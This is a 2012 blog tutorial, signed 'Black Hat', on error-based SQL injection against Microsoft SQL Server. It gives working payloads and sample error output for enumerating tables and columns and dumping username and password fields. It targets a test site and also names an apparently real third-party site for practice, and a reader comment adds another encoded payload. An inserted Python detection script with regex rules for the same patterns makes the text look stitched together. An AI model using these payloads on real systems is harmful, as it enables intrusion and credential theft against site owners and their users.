Multiple Tables/Columns at once-Microsoft_db

Monday, November 5, 2012

Hi everyone. Today I'll show you an easy way to extract data from Microsoft_db.

First, the site:

PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1 

Table name:

PHP Code:
+AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables)) 

:: demo ::

PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1+AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables)) 

Conversion failed when converting the nvarchar value 'users' to data type int. 

If the users table is not the one that appears, we can change TOP 1 to extract more tables,

for example to TOP 2.

Change the second TOP 1, not the first.

LIMIT doesn't exist, so we use TOP X instead.

Now extract the columns:

PHP Code:
+AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns)) 

:: demo ::

PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1+AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns)) 

Conversion failed when converting the nvarchar value 'forumid' to data type int. 

To extract the rest of the columns, change TOP 1 to TOP 2, and so on.

TOP 6

Conversion failed when converting the nvarchar value 'uname' to data type int.

TOP 7

Conversion failed when converting the nvarchar value 'upass' to data type int. 

Extracting data

PHP Code:
+or 1=convert(int,(select+top+1+COLUMN+from+TABLE)) 

+and 1=cast((Select TOP 1 COLUMN from TABLE) as int)

I explained the other way here

PHP Code:
http://www.hackforums.net/showthread.php?tid=2533582 

:: Site for testing ::

PHP Code:
http://www.cumtux.org/default.asp?pageid=35&deptid=1 

Thanks for reading Black Hat
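
For defenders, the query shapes and the conversion error text shown in this post are usable detection signatures. The following Python code is an added example, not part of the original post: it normalizes a logged query string (URL-decoding and stripping zero-width characters) and flags these patterns on the request and response side. The rule names, function names and sample records are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus
# Zero-width/BOM characters that can split a keyword without changing how it renders
ZERO_WIDTH = re.compile("[\u200b\u200c\u200d\u2060\ufeff]")
# Request-side rules, modelled on the query shapes shown in this post
RULES = {
    "schema_enum": re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b"),
    "top_subquery": re.compile(r"\(\s*select\s+top\s+\d+\s"),
    "int_coercion": re.compile(r"\bconvert\s*\(\s*int\s*,|\bcast\s*\(\s*\(\s*select\b"),
    "int_compare_select": re.compile(r"\b(and|or)\s+\d+\s*=\s*\(\s*select\b"),
}
# Response-side rule: the conversion error that echoes a database value
LEAK = re.compile(r"Conversion failed when converting the n?varchar value '([^']*)'")

def normalize(query_string):
    """URL-decode ('+' and %XX), drop zero-width characters, collapse spaces, lowercase."""
    text = ZERO_WIDTH.sub("", unquote_plus(query_string))
    return re.sub(r"\s+", " ", text).lower()

def match_request(query_string):
    """Names of the rules that fire on a raw query string, sorted."""
    text = normalize(query_string)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def leaked_value(response_body):
    """Value echoed by a conversion error in the response, or None."""
    m = LEAK.search(response_body)
    return m.group(1) if m else None

def scan(records):
    """Return (index, fired rules, leaked value) for each suspicious record."""
    alerts = []
    for i, (query, body) in enumerate(records):
        rules, leak = match_request(query), leaked_value(body)
        if rules or leak is not None:
            alerts.append((i, rules, leak))
    return alerts

# Constructed (query string, response body) pairs; not real log data
SAMPLES = [
    ("id=1", "<html>thread 1</html>"),
    ("id=1+AND+1+=+(SELECT+TOP+1+table_name+FROM+info%E2%80%8Brmation_schema.tables)",
     "Conversion failed when converting the nvarchar value 'users' to data type int."),
    ("id=1+or+1=convert(int,(select+top+1+COLUMN+from+TABLE))", "HTTP 500"),
    ("q=how+to+convert+int+to+string", "<html>results</html>"),
]

if __name__ == "__main__":
    print(*scan(SAMPLES), sep="\n")
```

A check like this only surfaces attempts. The underlying fix is a parameterized query for the `id` value and a generic error page, so conversion errors never reach the client.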


Great tut but I have to comment on something
PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1+AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables)) 
This isn't necessary and might not always work
Because users table isn't always the second table
instead use this

PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1+AND%201%20=%20%28SELECT%20TOP%201%20table_name%20FROM%20information_schema.tables%20where%20table_name!=%27threads%27%29 
Great anyways


